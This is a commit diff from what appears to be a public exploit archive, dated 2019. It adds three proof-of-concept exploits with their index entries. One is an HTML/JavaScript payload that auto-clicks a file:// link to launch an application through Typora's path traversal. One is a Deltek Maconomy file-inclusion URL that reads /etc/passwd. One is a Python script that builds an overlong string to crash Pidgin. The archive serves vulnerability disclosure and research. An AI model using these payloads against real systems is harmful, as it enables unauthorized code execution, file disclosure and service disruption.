DB: 2019-05-28

3 changes to exploits/shellcodes Pidgin 2.13.0 - Denial of Service (PoC) Typora 0.9.9.24.6 - Directory Traversal Deltek Maconomy 2.2.5 - Local File Inclusion
2019-05-28 05:01:55 +00:00 · 2019-05-28 05:01:55 +00:00 · 18a676ca3b
commit 18a676ca3b
parent 0d68572071
4 changed files with 77 additions and 0 deletions
--- a/exploits/macos/remote/46932.txt
+++ b/exploits/macos/remote/46932.txt
@ -0,0 +1,38 @@
+Exploit Title: Code execution via path traversal
+# Date: 17-05-2019
+# Exploit Author: Dhiraj Mishra
+# Vendor Homepage: http://typora.io
+# Software Link: https://typora.io/download/Typora.dmg
+# Version: 0.9.9.24.6
+# Tested on: macOS Mojave v10.14.4
+# CVE: CVE-2019-12137
+# References:
+# https://nvd.nist.gov/vuln/detail/CVE-2019-12137
+# https://github.com/typora/typora-issues/issues/2505
+
+Summary:
+Typora 0.9.9.24.6 on macOS allows directory traversal, for the execution of
+arbitrary programs, via a file:/// or ../ substring in a shared note via
+abusing URI schemes.
+
+Technical observation:
+A crafted URI can be used in a note to perform this attack using file:///
+has an argument or by traversing to any directory like
+(../../../../something.app).
+
+Since, Typro also has a feature of sharing notes, in such case attacker
+could leverage this vulnerability and send crafted notes to the
+victim to perform any further attack.
+
+Simple exploit code would be:
+
+<body>
+<a href="file:\\\Applications\Calculator.app" id=inputzero>
+  <img src="someimage.jpeg" alt="inputzero" width="104" height="142">
+</a>
+<script>
+(function download() {
+    document.getElementById('inputzero').click();
+})()
+</script>
+</body>
--- a/exploits/multiple/webapps/46931.txt
+++ b/exploits/multiple/webapps/46931.txt
@ -0,0 +1,13 @@
+# Exploit Title: Maconomy Erp local file include
+# Date: 22/05/2019
+# Exploit Author: JameelNabbo
+# Website: jameelnabbo.com
+# Vendor Homepage: https://www.deltek.com
+# Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy
+# CVE: CVE-2019-12314
+POC:
+
+POC:
+http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//LFI
+Example
+http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
--- a/exploits/windows/dos/46930.py
+++ b/exploits/windows/dos/46930.py
@ -0,0 +1,23 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Pidgin 2.13.0 - Denial of Service (PoC)
+# Date: 24/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://pidgin.im/
+# Software https://cfhcable.dl.sourceforge.net/project/pidgin/Pidgin/2.13.0/pidgin-2.13.0.exe
+# Version: 2.13.0
+# Tested on: Windows 7, Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script 'pidgin.py', it will create a new file 'pidgin.txt'
+# 2.- Open Pidgin
+# 3.- Go to 'Accounts' > 'Manage Accounts'
+# 4.- Click 'Add...', paste the content of pidgin.txt into the field 'Username', 
+#     into the field 'Password' write anything, e.g. 1234 and click 'Add'
+# 5.- On the taskbar, click show hidden icons, right click on Pingin and select 'Join Chat...'
+# 6.- Now click 'Join' and crashed
+
+buffer = "\x41" * 1000
+
+f = open ("pidgin.txt", "w")
+f.write(buffer)
+f.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6467,6 +6467,7 @@ id,file,description,date,author,type,platform,port
 46926,exploits/windows/dos/46926.py,"Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)",2019-05-24,"Victor Mondragón",dos,windows,
 46927,exploits/windows/dos/46927.py,"Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)",2019-05-24,"Victor Mondragón",dos,windows,
 46929,exploits/windows/dos/46929.py,"Fast AVI MPEG Joiner - 'License Name' Denial of Service (PoC)",2019-05-24,Achilles,dos,windows,
+46930,exploits/windows/dos/46930.py,"Pidgin 2.13.0 - Denial of Service (PoC)",2019-05-27,"Alejandra Sánchez",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -17465,6 +17466,7 @@ id,file,description,date,author,type,platform,port
 46880,exploits/php/remote/46880.rb,"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)",2019-05-20,Metasploit,remote,php,
 46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php,
 46928,exploits/windows/remote/46928.html,"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption",2019-05-24,"Simon Zuckerbraun",remote,windows,
+46932,exploits/macos/remote/46932.txt,"Typora 0.9.9.24.6 - Directory Traversal",2019-05-27,"Dhiraj Mishra",remote,macos,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41349,3 +41351,4 @@ id,file,description,date,author,type,platform,port
 46903,exploits/php/webapps/46903.txt,"Horde Webmail 5.2.22 - Multiple Vulnerabilities",2019-05-22,InfinitumIT,webapps,php,
 46910,exploits/php/webapps/46910.txt,"Nagios XI 5.6.1 - SQL injection",2019-05-23,JameelNabbo,webapps,php,
 46921,exploits/php/webapps/46921.sh,"Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC",2019-05-24,"Todor Donev",webapps,php,
+46931,exploits/multiple/webapps/46931.txt,"Deltek Maconomy 2.2.5 - Local File Inclusion",2019-05-27,JameelNabbo,webapps,multiple,